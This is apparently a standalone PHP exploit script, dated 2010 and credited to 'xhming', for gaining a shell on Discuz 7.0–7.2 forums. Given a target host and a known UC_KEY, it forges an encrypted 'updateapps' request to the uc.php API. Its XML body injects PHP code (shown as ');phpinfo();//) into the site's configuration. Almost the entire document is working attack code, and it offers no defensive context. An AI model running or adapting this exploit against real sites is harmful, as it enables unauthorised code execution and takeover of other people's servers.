久久久电脑

by:xhm1n9

#!/usr/bin/php
<?php
print_r('
+-------------------------------------------------------------------------------------------+
2010.2.6
discuz 7.0-7.2 get shell
exploit by xhming
site: http://hi.baidu.com/mr_xhming
+-------------------------------------------------------------------------------------------+
');
if ($argc < 3) {
        print_r('
+-------------------------------------------------------------------------------------------+
error:php xxxx.com uc_ke
+-------------------------------------------------------------------------------------------+
');
        exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$uc_key = $argv[2];
$k=time();
$get=array('time'=>$k,'action'=>'updateapps');
$code=encode_arr($get,$uc_key);

$cmd = <<<xhming
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">');phpinfo();//</item>                          //插入的内容
<item id="bb">ffaaa</item>
</root>
xhming;

send($cmd);
       
function send($cmd)
{
        global $host, $code;

        $message = "POST "."/dz7.2/api/uc.php?code=$code HTTP/1.1\r\n";       //路径看着改
        $message .= "Content-Type: text/xml\r\n";
        $message .= "User-Agent: Apache XML RPC 3.0 (Jakarta Commons httpclient Transport)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
        $message .= $cmd;
       
        $fp = fsockopen($host, 80);
        fputs($fp, $message);
       
        $resp = '';

        while ($fp && !feof($fp))
                $resp .= fread($fp, 1024);
       
        return $resp;
}

function encode_arr($get,$uc_key) {
$tmp = '';
foreach($get as $key => $val) {
   $tmp .= '&'.$key.'='.$val;
}
return _authcode($tmp, 'ENCODE', $uc_key);
}

function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;

$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);

$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);

$result = '';
$box = range(0, 255);

$rndkey = array();
for($i = 0; $i <= 255; $i++) {
   $rndkey[$i] = ord($cryptkey[$i % $key_length]);
}

for($j = $i = 0; $i < 256; $i++) {
   $j = ($j + $box[$i] + $rndkey[$i]) % 256;
   $tmp = $box[$i];
   $box[$i] = $box[$j];
   $box[$j] = $tmp;
}

for($a = $j = $i = 0; $i < $string_length; $i++) {
   $a = ($a + 1) % 256;
   $j = ($j + $box[$a]) % 256;
   $tmp = $box[$a];
   $box[$a] = $box[$j];
   $box[$j] = $tmp;
   $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}

if($operation == 'DECODE') {
   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
    return substr($result, 26);
   } else {
     return '';
    }
} else {
   return $keyc.str_replace('=', '', base64_encode($result));
}

}

?>